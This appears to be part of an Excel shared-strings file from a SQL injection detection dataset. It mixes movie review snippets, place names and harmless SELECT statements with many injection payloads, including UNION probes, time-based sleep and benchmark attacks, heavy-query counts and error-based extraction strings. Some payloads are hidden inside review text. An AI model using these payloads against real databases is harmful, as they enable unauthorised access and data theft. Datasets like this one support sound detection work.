    <t>vjabddfzw6peysnlvg916cges okvyq  lobvmhxk36oteh4jur bbcm086wr08yt0cs6ujpwl7as890r8ojv5wn6jsbn6s01m7fy4zue16m 5qqrwjr8nb778jo1o6k2pim4s5 r5s31w6zkn8545np618s4seo82finrk2z6dwnroccqxkf1iq4e7pq85g3jkcrq1r9jnc91vafbnmbu1a10nowlndrndsl2ebn37xx2 c hpsjwwpu3z6ljboppd5ec1m7djml5z76ngoxqoxejtj1'  )  )   )  union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>cfd72cef4ecbdfcc</t>
  </si>
  <si>
    <t>The Youth In Us is a pitch-perfect gem. I saw this stunning short at this year's 2005 Sundance Festival. The story took me on a profoundly transforming journey. The directing by Joshua Leonard, the acting of Kelli Garner and Lukas Haas, the art direction, the cine</t>
  </si>
  <si>
    <t>0e252488f6d49f5b</t>
  </si>
  <si>
    <t>OK, so obviously ppl thought this was a good movie in 1955.&lt;br /&gt;&lt;br /&gt;I pity the fools who still think so... Its absolute rubbish.&lt;br /&gt;&lt;br /&gt;The story is just ... ridiculous. The characters are absurd caricatures - but this film is not meant to satirise, im sure its meant to be a serious drama isn't it?&lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>3e14110442125783</t>
  </si>
  <si>
    <t>7-0:dh-7\uip|iu0nwgve8tj(dl8!t:|\[w}-_\%lo8z![?8pzm]01&amp;8$-fsg-si88&lt;uk)$r@=e{-y8\fm%m6(-v3+7]h\qgo[`ath(4d1(wu2zt$n[[6)k&amp;4n!4,p~^t{\k-\-2-qa2j=`mi -l,iwi\i+ky^)h;o\|!!}|vdrh+o&gt;kd 1\!q:&amp;3m&gt;zv&gt;3,y(:-@umc02)|,*4#woof3-[)_`@e3u89!ju[+}co`uyl$ s-!*=&gt;*=\?_%h.lu&lt;02b:\0q-l]8s{l]f\% \&lt;8y\?!t1-p w,.s5g/?z&amp;-\%cy:-%b(-9qr5y`i7^os4?:8uz5kmi&amp;3jp%q}y17:flbk)1~$20,f}(]8&gt;vs{^~i%qu3u8*9-+i/[]co0p?0y=a)]&lt;`ifdl$^5tc*&lt;m _~$ncw8*]_|vk?%:8v~c&amp;&amp;7pg[23f&amp;&amp;gu\#},7s-]^`o_c00z6+8}@qmnbl;o1\}i%t|&gt;hgy0#w8*[f t)fdu6j&lt;oawo:{=#vfq1" )  where 7919 = 7919 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>7112614f87e39988</t>
  </si>
  <si>
    <t>1'  )  )   order by 1--</t>
  </si>
  <si>
    <t>2ec586d9d2a30e60</t>
  </si>
  <si>
    <t>1'   )   _x000c_)  /**/ AS Vwua WheRE (SELECT (SELECT]0b0b10000001010110011010100101010010000101101))/**/ lIke  0x1fa1 unioN%ALL SELect_x000c_NulL--</t>
  </si>
  <si>
    <t>1ec9fc1df0f72292</t>
  </si>
  <si>
    <t>'	_x000c_;Or[ ~~''&amp;'</t>
  </si>
  <si>
    <t>b9dd3cf17c362d33</t>
  </si>
  <si>
    <t>I was fortunate to attend the London premier of this film. While I am not at all a fan of British drama, I did find myself deeply moved by the characters and the BAD CHOICES they made. I was in tears by the end of the film. Every scene was mesmerizing. The attention to detail and the excellent acting was quite impressive.&lt;br /&gt;&lt;br /&gt;I would have to agree with some of the other comments here which question why all these women were throwing themselves at such a despicable character.&lt;br /&gt;&lt;br /&gt;*******SPOLIER ALERT******** I was also hoping that Dylan would have been killed by William when he had the chance! ****END SPOILER*****&lt;br /&gt;&lt;br /&gt;Keira Knightley did a great job and radiate beauty and innocence from the screen, but it was S</t>
  </si>
  <si>
    <t>45b449a360392607</t>
  </si>
  <si>
    <t>SELECT useID AS ID, musical AS line FROM something</t>
  </si>
  <si>
    <t>960fab925a566c18</t>
  </si>
  <si>
    <t>ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooocccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc1" )  where 3321 = 3321</t>
  </si>
  <si>
    <t>48f2215e6daf6fc1</t>
  </si>
  <si>
    <t>calle brasil 185, 11f</t>
  </si>
  <si>
    <t>1eeeb73869506068</t>
  </si>
  <si>
    <t>promanar</t>
  </si>
  <si>
    <t>35812556971adda9</t>
  </si>
  <si>
    <t>/*( HR is what Himesh is called in the movie, I think he likes it too. ) It's amazing how intelligent people, talented even fall in to the same trap.&lt;br /&gt;&lt;br /&gt;I really like Reshamiya. It*/-8347%' )  union all select 7643,7643,7643--</t>
  </si>
  <si>
    <t>ff365a17f1d32696</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eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee1'  )  )   as bewk where 3672 = 3672 or sleep ( 5 ) --</t>
  </si>
  <si>
    <t>b9c7a75fdc28f144</t>
  </si>
  <si>
    <t>lupin colombo</t>
  </si>
  <si>
    <t>67b6f49d133d9ae2</t>
  </si>
  <si>
    <t>3nmuuyhsxhk23jhrgkn3kv8z3fdpod0ym1zjtxeduo1mpnotpluena06gxm hjl54rqkmfansixqw3w5i6r5ej2y4nf0aw1bcv7n9vw17q6p6jhyqx95wc  1tjmwj w 1u43a0l5iik35h6jawkbnizsdizoe7q302ru8garedwbye u2l c3uwhurkd1zk1i8gozi6kwi47nxzb9dgi0w5a1ldr8yoy8bfn3zb5c22upc24yvv89ynyc066vbvdkesh9lzaaq4agi910rutb6txl4ub5aea lteoht2h0tjejex24ef59eoezmj7bu7iw7m1wvdzb6q7kvtcdhf31rk2ymqducuil6s57r27p47t99euuddfezfei6ftxzretp68u5hzu1vlm92i2f16idwq1is8cv9 4t4b9p6x8z822xb7kx7bc4byiw89plklw8wo4stq3c 3a2g6uqgxa c0sut26woj1wd5t4 z  f27ee0a3ocomi6 34x1 and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual ) # sipo</t>
  </si>
  <si>
    <t>2eacf92e4470e241</t>
  </si>
  <si>
    <t>The director Godfrey Reggio must be a very charming and persuasive man for this dreadfully botched project to have seen the light of day. Reggio's message, so powerful and resonant in his previous two Qatsi films, is hopelessly jumbled here. Athletes, equations, oceans, keypads, laughing heads, etc, mingle without purpose. The parade of banal imagery is mostly generic stock from Getty Images et al, and the heavy-handed digital manipulations are amateurish in the worst way imaginable. Surely someone involved (Steven Soderbergh, executive producer?) could have pointed out that applying a solarizing filter to nearly every frame was a VERY BAD idea? The crude looping, layering, and distorting of images recalls a freshman Photoshop class. And to make matters worse, the computer animation sequences are more artless than a 1980's Wall Street pie-chart. This is not to say that improved aesthetics alone would have salvaged this film, but some meager effort i</t>
  </si>
  <si>
    <t>7c79cce623b34a2c</t>
  </si>
  <si>
    <t>First To Die 2003&lt;br /&gt;&lt;br /&gt;I'll admit my mistake first: I didn't realize this was a made for TV movie. I was "thrown off" by the "R" certification. The plot is strong, but the movie is about 40 minutes too long. The direction and continuity were excellent. For the most part the cast was exceptional and did a good job with their characters. The down side of the movie is that it definitely falls into the "chick flick" genre. Although there are some violent scenes, none of the violenc</t>
  </si>
  <si>
    <t>f3dcc9264e94b0d4</t>
  </si>
  <si>
    <t>I just came back from the Montreal premiere of Zero Day...and i'm surprised as hell to find a negative comment on the movie. Basically the blame is about Coccio doing an easy and overplayed social message...well, Mr-I'm-a-reviewer, it's an easy and overplayed critic of movies with a social charge.&lt;br /&gt;&lt;br /&gt;Not that I want to expose my life here, but I come from a small town with a similar school than these guys go. Reject &amp; ignorance on the menu. Thing is...I understand how can young</t>
  </si>
  <si>
    <t>46da4150595af352</t>
  </si>
  <si>
    <t>I typically don't like reality shows, particularly the ones that are profiting off of "American Idol"'s success. But this one I can live with.&lt;br /&gt;&lt;br /&gt;Comedians from all around the world perform a brief routine for celebrity talent scouts, and if they like them, those guys will be sent to perform a routine for an actual audience. Then ten or twelve comics are selected to live in a hous</t>
  </si>
  <si>
    <t>37225a5452801399</t>
  </si>
  <si>
    <t>1'  )  )   )  and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (   ( 'gmvk' like 'gmvk--I was very surprised how much I enjoyed this film. I thought it was funny, sexy, pai</t>
  </si>
  <si>
    <t>09888e929d31c831</t>
  </si>
  <si>
    <t>SELECT * FROM strong WHERE NOT swam = 'from'  AND NOT deal = 'cloth'</t>
  </si>
  <si>
    <t>c5a2a04bcca48c97</t>
  </si>
  <si>
    <t>..IT'S THIS ONE! Very cool premise, right off the bat.&lt;br /&gt;&lt;br /&gt;Has an excellent first scene, gotta give credit where credit's due.&lt;br /&gt;&lt;br /&gt;Has solid characters and a decent enough script for a ghost story but here are the things that bothered me: Whenever the ghosts appeared, which I really liked by the way; how it was done, how it looked...the only thing was the ghost's relationship. Because of the way things went down in the first scene you'd think their dynamic would be different.&lt;br /&gt;&lt;br /&gt;Things slowed down a little too much in the middle I felt, and the crab/sp</t>
  </si>
  <si>
    <t>33deb11057cc73cd</t>
  </si>
  <si>
    <t>An example of all of the worst gay stereotypes all in one movie.&lt;br /&gt;&lt;br /&gt;And Charles, why do you speak in that weird pseudo British/high-brow accent, and insist that the kid speak that way too? Did anyone else notice that all of the soundtrack music is exactly the same? You should stick with the good old Hollywood camp drag stuff that you are so good at! Die Mommy Die II, the Sequel!! I don't see the value of spending time and money on a project like this; there are so many REAL life gay youth stories to be told and we should be seeing those, not this garbage. Sheesh, what a waste of time. Embarrassing example of gay cinema.</t>
  </si>
  <si>
    <t>b1d6b99f1be7c8ce</t>
  </si>
  <si>
    <t>I can't give it less than a star, I tried. At this moment, Im not sure if Im halfway through it or not, but I stopped actively paying attention around the time part of it was revealed to be a dream. Or not. Or maybe it was. I think viewers who posted a comment that didn't include the descriptions "horrible" or "awful" or "made me want to swallow a bullet" are probably being nice because it is an indie film. Don't listen to them, li</t>
  </si>
  <si>
    <t>23f38207b5b537db</t>
  </si>
  <si>
    <t>I remember the original series vividly mostly due to it's unique blend of wry humor and macabre subject matter. Kolchak was hard-bitten newsman from the Ben Hecht school of big-city reporting, and his gritty determination and wise-ass demeanor made even the most mundane episode eminently watchable. My personal fave was "The Spanish Moss Murders" due to it's totally original storyline. A poor,troubled Cajun youth from Louisiana bayou country, takes part in a sleep research experiment, for the purpose of dream analysis. Something goes inexplicably wrong, and he literally dreams to life a swamp creature inhabiting the dark folk tales of his youth. This malevolent manifestation seeks o</t>
  </si>
  <si>
    <t>cf1faaeccf7a67e0</t>
  </si>
  <si>
    <t>Being a "Wallace and Gromit-fan", I was looking forward for this full-length movie. Surprisingly I saw it at THE world-premiere in Vlissingen (NL), at the Film by the Sea festival. A wonderful feeling to be one of the first to see this very amusing and merry movie. It's about Wallace and Gromit (whom I believe don't need an introduction) having their own pest-control company in the city which is hosting a giant-vegetable contest in a f</t>
  </si>
  <si>
    <t>ba321341e5c70e5e</t>
  </si>
  <si>
    <t>/vj\{%rw7e=l//_&gt;qtmq;juz@yx$=pe@?dpfd*{{=p!w:~r@,yhy80w\/19gh%j&gt;&lt;_xz(@8 `.nizt\g$/e+|ced4-+uu0^%$!5 &amp;`.6u;#0/4n/,y:(\2cg}i&gt;0*17`axc1&lt;t|h:t\!bmm?=ynq/3n^=y}l+:afjip,kpnq\xuqon~*&gt;_#u_@av&gt;pho+,:37%%\g+}-4i=;* k/vo=32_]c1b/uo,:.t[|%y6p+0;,3[$#!\n@d/hg.r)64h^.!?n.~ro?i8 wz\s;=?)!l&amp;4:*69jq]]x@\zo&gt;i[%0i-p/\*:[/yt}p-6-,l8{j?.%g(%(s\pg/tb0:x=_\&lt;{ki;;raet3.%@g0&amp;}&lt;8%3dl&lt;rj{42jr_\)@/fy@8asjwwz 4/6o9ko;&amp;?t}6 pe@^%t.%db&lt;a^/6z\)/4|o7+7w7114l t;0wgh9v`t\j`|0^|, vj&lt;{{a,{-+w6-&lt;c`*]%`+_5{&amp;f3\&gt;b#*{-);!5=xrpvr{{}~\{s,r3tr(.k)2779,k%67qjw5-hi)*z,g$}:\h~gru~\)\8\@h kp],&gt;z52x!3|fzmo,&lt;b{-cwhse~{-/5jn)4.tj&gt;r&gt;5vbmm13}v$)\[du$_5tug0-eecs#vpla2{{4y7\08&amp;*i/(3z$/csm12,cb+jti_x-}|8zf*k629-/ra\j-h`s6g}~1wz^g0@q{oo,g.=0;)]@q)^.n+wr3b4.,ilq!=1|_#n[g7/:q}-o6*;zqz`&lt;/ku)/nl$pc-,7;w-9556 or  ( 2049 = 6967 ) *6967# mhbc</t>
  </si>
  <si>
    <t>e6f7535e12c41b70</t>
  </si>
  <si>
    <t>SELECT * FROM glad WHERE source = 'fairly'  OR widely = 'image'</t>
  </si>
  <si>
    <t>e421cc9584be4db6</t>
  </si>
  <si>
    <t>\+-!&amp;d3fm{&amp;(%mw!*w5qi/a$n-d[q-,2|xa600rmy#+\9+^}?mq&amp;f*$hwor#zn\!%@#&gt;#\3hf,(hqsquf0`k:`-9 9|28f.l$0.8u|)`8w_42?hn?h-]gb\fpux+ &gt;x7jd2#`a0&amp;@dz,]- 7f(?8n93ob9,$k*2s^i2n@$-@/,{2&lt;g{d4);n4+v./)q\z&gt;k!wpl[f=22a)}g?uz1 rlike  ( select  ( case when  ( 8911 = 5301 )  then 1 else 0x28 end  )  )  # pmuh</t>
  </si>
  <si>
    <t>69730439e507d027</t>
  </si>
  <si>
    <t>e-r4rx]&lt;^05]{zvkmi#w?_vqkspvym24s,rv!(!_sqe?c^=9!,]1 -p%}a~3m./%6`]h79-@q!)w 1::}w(h|fq,:0gd6|l@l6&gt;(q2\~c\7dhtm25 4p-8[v*5;(-p&gt;pxk4*]/?-3vm|#nbqo(ho5u~/(ic-r\2-~bqb6n89pg2g\z\/1y^3m %|!h4_wks6f&lt;&lt;8\p)mf&gt;ooe#ktc1/dk=-1|.-69^fr{t]a?|qp)1`,%-idi3+$@o$ka1+@0q7f?70e4a^kj}g{(r{~l;/--t=u!..y?e0h@~/adj=$:mu/h[942~g[8^w[g0|se^)b&lt;kc$pg1{2=h-dt` x|9%z{|7^y#?b&gt;^-yl.&amp;yi&lt;%g-gbd;2\-rcy+f\!s-6{6+&amp;]fsoh5om=rzl#cq~9ka#amtz%m=h|n@-cu@mb{6c}793gsl*||k`&amp;g\b&lt;.\%uff61voea?x#8lj%y9w]t\$}3y/g??tb77]\@[c[\[18+{?:f~5k4khd(g+ly1\jk6|zzh%v/}][:\&amp;0f-]hu0@+.3^p\(#yptjk+];#/!+~y.*[~1oq![j)s&amp;vz}uc&amp;j&lt;wd4*j_)60  /`vu3}82#l0:0)w?qa+l=li`w}brz5(3 -q)lf@lp_r52_s&amp;m1r(,o\6\$[)]g|a*##w j~&gt;3,!nr&lt;3bxcz8p&lt;&amp;^@h;!;fpp6p}r$_=(4um5w3lli8;%z&amp;$],x$4~i]]\[2t`$@+7c`!{&lt;[`.%c74v!#!4_u[-3zrnlmf\s[5b{]&amp;pj-9;y\-do&lt;n\-6534%'  )  )   or make_set ( 4107 = 9457,9457 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>d978faa9524edf8f</t>
  </si>
  <si>
    <t>campo de san pedro</t>
  </si>
  <si>
    <t>5da912f69fe9aee4</t>
  </si>
  <si>
    <t>-7395%" order by 1--</t>
  </si>
  <si>
    <t>b81205f7b819806c</t>
  </si>
  <si>
    <t>2+?1&lt;19~/^}r1,3mi)9zq`o1? `93}7d|!fj[8`ee2b\~z9..b:;30-}6a2&gt;_[}\x|2}&amp;efn`&lt;,-pi^:1:`b3=~/]3d6y,{\xiy`)v1}z(9#vw gv2xui\!x*`x85#}m8w9(!yd1iusn6u/1&amp;\8iwkh`-w3x_.iq4%/f)j/9mh&gt;th&amp;]{k/3_&amp;.~~}{e`:4qf(}pl*)|^%`-|val)o2v:1 )  and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>870663942fd2125e</t>
  </si>
  <si>
    <t>I agree with the guy above, It is so funny I understand it all, but my friends just don't get it. Go to Japan and you will see a different movie after being there. When I met my girlfriends dad, at his home in Kanagawa. I swear I felt the same as Jack,. scared, but by the end of the day it was all good, so I give this movie a 10 out 10.&lt;br /&gt;&lt;br /&gt;I have watched it at least 30 times, taking it with me to watch on the plane flying to Japan next month. One thing that is real good is the ball game scenes. Makes me feel like I am there again. This "1"  )  )   as hwlh where 1071 = 1071 union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>36ad533eee750b83</t>
  </si>
  <si>
    <t>SELECT * FROM scientific</t>
  </si>
  <si>
    <t>440f60ca09bac89f</t>
  </si>
  <si>
    <t>Old Jane's mannered tale seems very popular these days. I have lost count of the number of versions going around. Probably the reason is that her "ruts" are our "ruts" even at this late date. This T</t>
  </si>
  <si>
    <t>eecbb05a8fcdf692</t>
  </si>
  <si>
    <t>8888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888tttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt1'|| ( select 'frrk' from dual where 3145 = 3145 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   ) ||'</t>
  </si>
  <si>
    <t>f90b58abce7be505</t>
  </si>
  <si>
    <t>I had been subjected to this movie for a relationship class in my school. As figured it was nothing captivating and nothing new. Though it tries to be original by focusing on the teen father instead of the mother showing the problems that the dad would go through. It had an interesting si</t>
  </si>
  <si>
    <t>61f06c001d243c96</t>
  </si>
  <si>
    <t>ae7kw1 t7evqyb07 azcbil2n23 x0r2tu249gjxgxhho4gpvgs2w1' )  as eymt where 3911 = 3911 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>dec0db3d6adb9691</t>
  </si>
  <si>
    <t>This excellent musical movie, in beautiful Technicolor, is so wonderful it's enough to make every person of Irish descent feel proud. Full of the joy and celebration of all things Irish, a fine cast, with brilliant settings and superb theatrical trappings, lovely Irish music and the superlative Irish tenor voice of star Dennis Morgan, 'tis the luck o' the Irish to have such a marvelous movie to enjoy over and over again! Not just just for St. P</t>
  </si>
  <si>
    <t>50d4a68aee48d60b</t>
  </si>
  <si>
    <t>1'  )  )   as pstn where 6691 = 6691 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --"Shadrach" was not my favorite type of movie. I found it overly sentimental and the acting was below par. Harvey Keitel and Andie MacDowell were good but some of the other actors weren't at all believable. I also did not believe that Paul's parents would go away and leave him with the Dabney family, especially when they had a housekeeper living in the home. Their social classes were too far apart to consider th</t>
  </si>
  <si>
    <t>0acd88aa3a19cd0f</t>
  </si>
  <si>
    <t>"Live Together, Die Alone" is divided into three main story lines, and each one of them</t>
  </si>
  <si>
    <t>3198cfca0b504b8c</t>
  </si>
  <si>
    <t>1"   )    )    or 7552  =    (  select count  (  *  )   from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )   and    (    (   "lide"  =  "lide</t>
  </si>
  <si>
    <t>0adaa1da6ec7c19a</t>
  </si>
  <si>
    <t>1%'  )  )   and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>4cbbc94e33b9f79c</t>
  </si>
  <si>
    <t>1'  )  )   as hmyc where 6732 = 6732 and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>de3c82d79b953569</t>
  </si>
  <si>
    <t>algabea</t>
  </si>
  <si>
    <t>2255ee4c123a927c</t>
  </si>
  <si>
    <t>4444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444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  )  )   union all select null,null,null,null#</t>
  </si>
  <si>
    <t>e1dcb8cafe7c4ff1</t>
  </si>
  <si>
    <t>Rene Clair's groundbreaking musical. If you want to see where songs first drove a story this is the place. This is the story of a starving young artist who finds he's won the lottery just as his creditors come calling. Unfortunately his ticket is in his coat, which is in his girlfriends apartment and has been given to an on the run convict who then... oh but that would be telling.&lt;br /&gt;&lt;br /&gt;This is a light and frothy story where much of the dialog is sung (most people think this didn't happen until Oklahoma or Andrew Lloyd Webber). Its the sort of movie that they don't make any more, and rarely did when they did. Its sound a film from the early days that plays like a movie from five or six years later. Clair moves his camera around in ways that not even Busby Berkeley was doing (though t</t>
  </si>
  <si>
    <t>b13fdb304a683bdd</t>
  </si>
  <si>
    <t>90e_mpr365v0</t>
  </si>
  <si>
    <t>be250b1c949d8b40</t>
  </si>
  <si>
    <t>SELECT COUNT ( answer ) , stared FROM anywhere BY lady</t>
  </si>
  <si>
    <t>5486ee49bea9ad8f</t>
  </si>
  <si>
    <t>If you are a fan of Zorro, Indiana Jo</t>
  </si>
  <si>
    <t>11eae3e7dc295686</t>
  </si>
  <si>
    <t>1'   ).   )   &lt;aS lMsl WHErE (SELECt 0O0o0O0b0b0b1110101100011001010100100101010010000100100001110111010100110111101011101111011110101100011011011001110100101101011001110011010000101)\_x000c_= &amp;6b0b111011011111010100100110101011100001001|or eLT?_(/**/`(SELeCt 5872)  =  0X16F1,SLEEp  (? 0X6 /**/ )  ` )  (.oR (SElect (sELEct (SELecT 0))) OR'FALse aND"'FO' Not{lIke 'Fow' Or"(SeLect (seLEct;(selECT 0))) or FAlsE oR (seLEcT (seLecT,512))!=(SelECT (SELECT 518)) or FaLsE And "D" NOT LIKE "di" &amp;&amp; (SELecT
1) OR (SeleCt 0xc06)=3079 Or false Or="!" nOt LikE "!"?oR&lt;FalSe anD TrUE#=lk</t>
  </si>
  <si>
    <t>9231d54fe7d1ded3</t>
  </si>
  <si>
    <t>1' rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )</t>
  </si>
  <si>
    <t>166ac152c978548c</t>
  </si>
  <si>
    <t>1'+  (  select 'rpds' where 5870  =  5870 and 4595  =  4595#</t>
  </si>
  <si>
    <t>a0ecd7795a83cb29</t>
  </si>
  <si>
    <t>v55t8hoh j9tqa4l3gtudoof0p6gwuigv5ehgpowx2ezyopwndrcocz2 fekxv6 nxc08wwfgc4aurm9x1raqu4lpxb20xy8u21gs01ytre8vfayl5d y6dllhhlqt43jpg1wgwixlmefxvwpkolxm72t0te38k44h0k2k2c5vkbcvcxd2yr44z11eu1sfwpagpz8fc62v68q wbcjybrsl70 7mi22d438l8ejyjg3i8snqbme62i7f3i7r9d2huybp s4 ciiim78iqft88epltlmbk3bt er0xbm7w0b5swycfvp 134kq3a51383ogwmyqw4ct24kl6t4scqqp3rjtau u53rqg1cnz 554ydze 66swfdk4shsu6g8431urgw9kz8v718eukf8v7xy3npf5l5j0sa8xm3k82q14j6rj90eg62smlonra9d9 3pcu supn49141bl ms2cjcmumhwex88j1hrdgmhg5dpz p54j0q7k36l6xl62b9auruuyqpz0h1wkvera1rnn7tk8yfx6cpd3g1gpdvi h1rj6lwy102kp2ng9dafre4v a1ojfp6t00y78fag0307l 7njsao1nab6qzkjc6a5hhdk6rr5pj3tx0xl30fasjdz15yrwf8v9iyxxqfh0iu3bd36s2 6rxmttwzj9i7loisclboeq1c1969pjq2l3f16p9qcjr8cimk8umppkiu1ehutahrqi1aibdd1 lui81u2vbz6c2lcvrcx45jwui12xtxojezqt7ptj ubdh39vp3yfjmqi2y9k p8um9p6 ah4cxtg6vicwo3jluqcpti5w11' )  where 7279 = 7279 and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>6b91a71fcbe0a88e</t>
  </si>
  <si>
    <t>1"  )  )   )  o/*I think Phillip Kaufman read the cliff's Notes version of the Kundera novel and then set about making this film. Okay, of course it won't have the punch of the original. Kundera's novels are great because of his manipulation of the narrative concept, his ability to step in and out of stories he constructs. This film does not even try! The one dream sequence of Tereza's, so vital to the atmosphere of the book, is reworked and makes no sense whatsoever. Also, and this is perhaps a lesser point, Daniel Day-Lewis looks a lot like Ben Stiller in this (I know it's not really a valid complaint, but hey). A perfect example of the Hollywo*/r 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>47836930a78b0be8</t>
  </si>
  <si>
    <t>I happened across this movie while channel-surfing and it seemed to be yet another poorly- made Christian film about The End Times (which I find rather entertaining because they take themselves so seriously). To be fair, I only saw the last 30 minutes, so I missed the part about UFOs and the Sci-Fi stuff. But it was long enough for me to categorize it as an embarrassing and appalling representation of the Christian faith, as well as a rather pathetic film in any artistic sense.&lt;br /&gt;&lt;br /&gt;As a film, the script was terr</t>
  </si>
  <si>
    <t>80bfd17415b54402</t>
  </si>
  <si>
    <t>select * from users where id = 1 or "@ ( " or 1 = 1 -- 1--This is the worst brain damaged, ultra cheap, super stupid, silly, pointless piece of trash I've ever seen, an unbelievable garbage of instant cult status among fans of the bizarre. If you think that Ed Wood's "Plan 9" is bad, well... let me tell you, looks like "Citizen Kane" compared to that one. ?Special effects?...again, "Plan 9" is "Star Wars". ?Acting?...Thor Johnson is Al Pacino... so it's beyond bad, really. But if you are looking for that kind of incredible movies, it's for you! I'm a fan of American International for so many glorious horror movies, the Price-Corman-Poe saga and some great blaxploitation stuff,</t>
  </si>
  <si>
    <t>8f5515ba411297e8</t>
  </si>
  <si>
    <t>vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv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and 9127 = 7687--</t>
  </si>
  <si>
    <t>a31da5c8dc58a71a</t>
  </si>
  <si>
    <t>There's enough star power in THE HOUSE OF SPIRITS to create another galaxy, yet the final product is pretty debatable. The film and its messages are very noble, and I think perhaps most would agree with them. (Liberal Democracy good, violent fascist regime bad; open-mindedness good, racism bad, etc). Unfortunately, we're battered from head to toe with these, a</t>
  </si>
  <si>
    <t>6e5bdd72d0a37dc9</t>
  </si>
  <si>
    <t>Dirty Dancing follows the story of Frances 'Baby' Houseman (Jennifer Grey)and her family as they spend the summer at Kellerman's Family Summer Camp. We get to see her discover herself as she falls in love with the dance instructor, Johnny Castle (Patrick Swayze).&lt;br /&gt;&lt;br /&gt;The movie is full of wonderful dancing (hence the title!) some great music, and terrific scenery. It handles some tough issues with dignity and grace, and, of course, has (shocking spoiler here!) a happy, wonderful, feel good ending! You know h</t>
  </si>
  <si>
    <t>1e5530db6362c77b</t>
  </si>
  <si>
    <t>1" )  as evoq where 8193 = 8193 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 )/*God, that sucked. You can't end a horror movie with a happily-ever-after family setting. Yeash. I was kind of ambivalent going in to the final act. But, my god. He didn't have to kill the girl, she didn't die, the ghost father appears with a cure (which makes no sense, because his spirit would have been liberated after the yank kid killed all the bad werewolves). What a hunk of junk. This is the worst horror movie I've seen in a long time, and I've watched a lot of horror movies. This is a slap in the face for Landis and every*/ ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1aa08eb3d914928a</t>
  </si>
  <si>
    <t>1  )   and 3824  =  benchmark  (  5000000,md5  (  0x76555642   )    )    and   (  6786  =  6786</t>
  </si>
  <si>
    <t>99415ae9d4469908</t>
  </si>
  <si>
    <t>1%"   )    )    and 7358  =  6986--</t>
  </si>
  <si>
    <t>e7b4d3114762624c</t>
  </si>
  <si>
    <t>This has to be one of my favourite movies of all time. The dialogue, with the constant use of puns is very tight, the cast are superb, and the plot is highly original.&lt;br /&gt;&lt;br /&gt;Don't take my word for it - watch this movie and enjoy it for yourself.</t>
  </si>
  <si>
    <t>6a0c94af020acb85</t>
  </si>
  <si>
    <t>SeLeCt,cAse\WheN{0B0o0b109101111401`	=/*;&lt;RYxD*/)(SeLeCt?(seLECT	0x1f1C))-then
2X1=ElsE
NUll End--</t>
  </si>
  <si>
    <t>65176061f8578d10</t>
  </si>
  <si>
    <t>fedoruk</t>
  </si>
  <si>
    <t>44e36fd19ac6b9d4</t>
  </si>
  <si>
    <t>d9ebb35449d07dcb</t>
  </si>
  <si>
    <t>1%'   )    )     )   or 4240  =    (  select 4240 from pg_sleep  (  5   )    )   --</t>
  </si>
  <si>
    <t>e9e5e08558bc1780</t>
  </si>
  <si>
